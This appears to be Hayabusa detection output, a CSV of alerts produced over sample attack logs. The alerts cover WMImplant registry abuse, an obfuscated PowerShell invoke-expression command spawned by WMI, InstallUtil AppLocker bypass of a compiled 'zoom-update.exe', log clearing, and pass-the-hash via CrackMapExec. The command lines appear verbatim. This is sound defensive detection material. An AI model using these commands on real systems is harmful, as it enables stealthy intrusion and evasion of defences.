+2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process:  | Target Server: cifs/fs03vuln.offsec.lan,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx
+2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:46.157 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157add,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157afc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
